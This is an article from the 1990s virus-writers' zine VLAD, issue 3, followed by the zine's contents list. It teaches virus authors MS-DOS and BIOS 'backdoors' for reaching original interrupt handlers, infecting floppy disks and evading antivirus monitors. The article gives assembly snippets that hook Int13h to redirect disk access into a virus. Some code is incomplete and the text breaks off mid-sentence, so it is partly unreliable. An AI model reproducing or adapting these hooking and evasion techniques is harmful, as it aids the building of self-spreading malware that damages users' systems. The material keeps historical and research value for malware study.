Virus Labs & Distribution
VLAD #3 - Backdoors

   +--------+                         Qark/VLAD

   The information in this article concerns the backdoors in MS-DOS and
   BIOS that can be used and abused by a virus for it's own ends!  Most
   of them concern the Int21h DOS services interrupt and Int13h Disk

   Int40h - The floppy disk handler gets relocated to Int40h by the Hard
	      disk BIOS and is called by Int 13h.  Int40h can be hooked and
	      used to infect floppy disks.  Be cautious when using this
	      because if no harddisk is present it isn't set.

   Int30h - This is not infact an interrupt at all.  It is a far jump
	      to the original interrupt 21h handler that is stored at
	      the address of int30h.  It was originally used for the CP/M
	      emulation in earlier versions of DOS and remains there today.
	      If you look at the PSP information, at PSP:[5] is a 'call
	      to the DOS function dispatcher'.  It actually calls the int30h
	      we are talking about (but due to a microsoft stuff up it misses
	      by two bytes).  There are two ways of using this backdoor, the
	      first way could be for a really hard method for infection or a
	      good destructive payload.  You can use it directly by calling
	      it in an unusual fashion.  This function could be messed up by
	      some programs but I have yet to see it not work anywhere.
	      Thanx go out to John Switzer for supplying me for this
	      information although I'm sure he wouldn't appreciate it's
	      use! :)

		Method One:
		  You can only use DOS functions AH=0 to 24h with this and
		  any functions that require AL can't be used.

		  Int21h        Proc    Near
		  ;Call this from your code with the same parameters
		  ; as the real DOS int 21h function.  
		  ;Truly weird I'm sure you'll agree!

			mov     cl,ah                   ;It uses CL.
			mov     ax,offset return_addr   ;Stack is backwards
			push    ax
			push    cs
			pushf                           ;Flags are last!!

			db      0eah                    ;JMP FAR PTR 
			dw      0c0h                    ;30h * 4
			dw      0                       ;Interrupt table.
			ret                             ;Back to user.
		  Int21h        EndP

		Method Two:
		  This is different in that it uses the segment:offset
		  address of the Int30h to get the original 'proper' Int21h
		  that we are all used to.  This method is used by the
		  writers of the MG virus (who also wrote creeping death,
		  very talented and good researchers!)  Anyway you can work
		  that out yourself, thats why it's called research!

   Int2fh - When DOS gets loaded it hooks int13h and saves the original
   ah=13h     addresses for its own use.  When this function is called it
	      returns two addresses where one is slightly closer to the
	      original int13h than the other, but I'm not too sure which is
	      the closer of the two (they are often equal).  If you play
	      with this yourself look it up in Ralf Brown's, you can probably
	      point the DOS calls to your virus if you do it right.

	      To grab the original int13h without messing up DOS:

			mov     ah,13h
			int     2fh     ;Get the int13h's

			push    es      ;Save them
			push    ds
			push    dx
			push    bx

			int     2fh     ;Put them back to what they were.

			pop     bx      ;Now we've got our handlers.
			pop     dx
			pop     ds
			pop     es

	      ;From here you can either choose to use ES:BX or DS:DX
	      ;as your int13h.

   Seg70h - Segment 70h is used by DOS.  All DOS disk access passes through
	      it at sometime.  All you have to do is scan through it for
	      the bytes of the different calls.  This method was first
	      used by the Creeping Death virus and is used in the 1984
	      (listed as 'ignorant' by CARO) and Daemon viruses.  I'd 
	      suggest running through this with a debugger and having a
	      look to work out what's going on.  DOS has been using 70:B4
	      to store the original Int 13h since DOS 3.3.

		mov       ax,70h
		mov       ds,ax
		mov       si,2
		or      si,si
		jz      wherever

		dec     si              ;SI-1
		lodsw                   ;DS:[SI] to AX  SI+2

		cmp     ax,1effh        ;FF1E = CALL FAR PTR [xxxx]
		jnz     first_backdoor

		cmp     word ptr [si],0b4h      ;This is just there :)
		jnz     first_backdoor

		jmp     set_fake_int13          ;We've found it!

		mov     si,[si]                 ;SI=Where the address is
		;save the int13h into the virus
		mov     cs:orig_store,word ptr [si]
		mov     cs:orig_store+2,word ptr [si+2]
		;point it to our virus
		mov     word ptr [si],offset our_int13
		mov     word ptr [si+2],cs

		;ret or whatever...

   Int2fh - Have a look at this interrupt in Ralf Browns (a must for every
	      virus programmer) it can do ALL the interrupt 21h functions!
	      The only problem is working out the DOS stacks and so
	      on.  It is handy for bypassing AV monitors, but it is much
	      too huge to go into in any detail.

   BIOS   - Within BIOS lurk a number of stationary entry points to
   entry      interrupts.  There are a few problems with these, as alot
   points     of BIOSes are incompatible and QEMM won't work with them
	      but they can be useful because there isn't ANYTHING that 
	      can be done to stop it.

	      Here are a list of addresses that are guaranteed not to
	      work half the time but have a look anyway.

		 F000:EC59      Floppy disk int 13h
		 F000:F859      Int 15h, sometimes useful

   Int2ah - This is called by Int 21h on every file related function.  By
   ah=82h     modifying the stack or certain registers you can change the
	      function that was called to whatever you want.  DOS stores   
	      the function multiplied by two in BL (eg Int 21h AH=40h will
	      be BL=80h when the int 2ah is called.).  If you change this
	      BL to another function it should fool most AV monitors.  This
	      may only work for some versions of DOS.

   Int21h - If you call this service you can do any DOS function.  Have a
   ax=5d00h   look!  All you have to do is set your registers up in a table.
	      It should be easy to write a basic simulated int21h using

   Anymore ?  Not that I can think of!  If you know any... tell me!!



ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


The Press
ARTICLE.2_2       Fooling TBScan
ARTICLE.2_3       Backdoors
ARTICLE.2_4       Tracing Int21
ARTICLE.2_5       Replication
ARTICLE.2_6       VSUM denial
ARTICLE.2_7       Proview


TBTSR Checking
ARTICLE.3_2       TBScan Flags
ARTICLE.3_3       HD Port Reading
ARTICLE.3_4       HD Port Writing
ARTICLE.3_5       TBAV Monitor
ARTICLE.3_6       Micro128 Disasm
ARTICLE.3_7       Aust403 Disasm


Virus Descriptions
ARTICLE.4_2       Hemlock
ARTICLE.4_3       Antipode
ARTICLE.4_4       Insert
ARTICLE.4_6       Quantum Magick
ARTICLE.4_7       Mon Ami La Pendule


ARTICLE.5_2       Small Virus
ARTICLE.5_3       Catch-22
ARTICLE.5_4       ART Engine
ARTICLE.5_5       Megastealth
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

About VLAD - Links - Contact Us - Main